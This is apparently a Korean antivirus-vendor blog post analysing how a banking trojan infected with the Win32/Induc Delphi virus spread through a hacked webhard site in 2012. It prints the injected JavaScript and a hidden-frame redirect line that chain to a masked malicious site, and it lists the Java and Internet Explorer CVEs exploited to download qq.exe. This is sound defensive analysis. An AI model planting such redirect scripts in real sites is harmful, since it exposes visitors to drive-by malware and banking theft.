온라인 뱅킹 트로이목마 Banki(1)

Boland사에서 개발한 프로그래밍 언어인 Delphi에는 일부 버전(Delphi4 ~ 7)에서 사용하는 Sysconst 라이브러리가 있다. Win32/Induc 바이러스는 이 라이브러리를 감염 시킨 후 컴파일 과정에서 생성되는 EXE, DLL 등에 바이러스 코드를 삽입하는 기법의 바이러스이다.

Win32/Induc은 2009년 8월경 발견되었으며 그 당시 국내에서 제작 및 배포되고 있는 Delphi 기반의 프로그램들도 해당 바이러스에 감염된 사례가 다수 있었으나 불행 중 다행인 것은 위에서 언급한 것처럼 Win32/Induc은 Delphi소스에 자신의 코드를 삽입하는 기능만 있을 뿐 감염된 소스가 컴파일 되어 생성된 EXE, DLL을 일반 PC에서 실행시켜도 아무런 피해를 발생시키지 않는다. 만약 Win32/Induc이 Win32/Virut이과 동일한 기능(파일감염, IRC채널 접속, 보안 사이트 접속방해 등)을 가지고 있었다면 다수의 일반 PC들에서 피해가 발생했을 것이다.

* Win32/Induc 바이러스 조치 가이드:

http://www.ahnlab.com/kr/site/securitycenter/asec/asecIssueView.do?webAsecIssueVo.seq=57

2012년 12월 말 경, Delphi로 제작된 Win32/Induc에 감염된 온라인 뱅킹 트로이목마가 해킹된 국내 웹하드 사이트를 통해서 유포된 사례가 발견되었다.

• 웹하드 사이트: http://www.****hard.co.kr/common/JS/action2.js

action2.js파일의 내부에는 아래와 같이 자바 스크립트 코드가 삽입되어 있었고 국내 UCC 동영상 관련 사이트로부터 cp.js파일을 다운로드하도록 되어있다.

if(document.cookie.indexOf('ggads')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='ggads=Yes;path=/;expires='+expires.toGMTString();document.write(unescape(““));}

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/cp.js

cp.js파일에 저장된 코드는 아래와 같으며 특정 게임 사이트에서 또 다른 악성 스크립트를 다운로드하도록 되어있다.

document.write(“<a href="http://flash.*****.pe.kr/adsi/adsi.html" rel="nofollow">http://flash.*****.pe.kr/adsi/adsi.html</a>width=0 height=0>“);

adsi.html 역시 동일한 사이트에서 index.html파일을 다운로드 하는데 해당 스크립트는 아래 그림처럼 Gongda Pack으로 난독화된 악성 스크립트이다.

•UCC동영상 사이트:http://ucc.******.co.kr/adsi/index.html

[그림 1] Gongda Pack으로 난독화된 index.html

위 [그림 1]에서처럼 index.html은 Gongda Pack 툴킷으로 난독화되어 있음을 알 수 있으며 국내 해킹된 사이트를 통해서 유포된 악성 스크립트의 대부분이 해당 툴킷을 통해서 난독화되어 있다. (참고로 index.html이 Gongda Pack으로 난독화되어 있음을 알 수 있는 부분은 바로 아래 부분이다.)

/*Encrypt By 210.***.53.***:2323's JSXX 0.44 VIP*/

난독화된 index.html파일을 풀어보면 아래처럼 우리가 흔히 사용하는 JAVA와 Internet Explorer에 존재하는 취약점을 이용하여 실행파일을 다운로드함을 알 수 있다.

[그림 2] 난독화 해제된 index.html

[그림 2]에서 보는 것처럼 qq.exe를 다운로드 및 실행하기 위해서 사용한 취약점은 아래 JAVA 5개, Internet Explorer 1개 등 총 6개를 사용한다.

Java : CVE-2010-0886, CVE-2011-3544, CVE-2012-0507, CVE-2012-4681, CVE-2012-5076

IE : CVE-2012-1889

위 취약점이 존재할 경우, 다운로드 되는 qq.exe의 내부 코드를 살펴보면 Delphi로 제작되었고 아

래 그림처럼 Win32/Induc 바이러스 코드가 존재함을 확인할 수 있다.

00003604 00403604 0 SOFTWAREBorlandDelphiRTL

00005568 00405568 0 SoftwareBorlandLocales

00005584 00405584 0 SoftwareBorlandDelphiLocales

[그림 3] Win32/Induc 바이러스 코드가 포함된 qq.exe

qq.exe에 의해서 다운로드되는 2.mp3파일도 마찬가지로 아래 그림처럼 Win32/Induc 바이러스가 존재했다.

[그림 4] qq.exe에 의해서 다운로드되는 2.mp3

V3 제품에서는 아래와 같이 진단이 가능하다.

Win-Trojan/Prosti.132540

Trojan/Win32.Banki